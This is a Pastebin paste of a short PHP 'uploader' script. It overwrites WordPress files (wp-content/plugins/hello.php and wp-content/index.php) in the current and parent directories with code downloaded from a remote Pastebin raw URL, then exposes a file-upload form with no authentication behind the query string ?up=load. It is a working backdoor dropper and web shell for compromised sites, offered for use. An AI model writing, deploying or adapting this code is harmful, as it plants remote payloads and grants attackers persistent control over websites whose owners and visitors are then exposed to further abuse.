Advertisement
MrN0body

up

Oct 8th, 2017
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.08 KB | None | 0 0
  1. <?php
  2. echo "Uploader by MrNobody";
  3. $Mr=array('/','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  4. foreach($Mr as $pa){
  5. $Nobody=array("$pa/wp-content/plugins/hello.php","$pa/wp-content/index.php");
  6. foreach($Nobody as $path){
  7. if (file_exists("$path")){
  8. $html = @file_get_contents('https://pastebin.com/raw/5xG9rCz6');
  9. $save=fopen($path,'w');
  10. fwrite($save,$html);
  11. echo "<br>twitter.com/0x_3a";
  12. }}}
  13. if($_GET['up']=="load"){
  14. if(isset($_POST['Submit'])){
  15.     $filedir = "";
  16.     $maxfile = '2000000';
  17.     $mode = '0644';
  18.     $userfile_name = $_FILES['image']['name'];
  19.     $userfile_tmp = $_FILES['image']['tmp_name'];
  20.     if(isset($_FILES['image']['name'])) {
  21.         $qx = $filedir.$userfile_name;
  22.         @move_uploaded_file($userfile_tmp, $qx);
  23.         @chmod ($qx, octdec($mode));
  24. echo" <a href=$userfile_name><center><b> $userfile_name uploaded <br> twitter.com/0x_3a </b></center></a>";
  25. }}
  26. else{
  27. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
  28. }
  29. echo '</center>';
  30. }
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement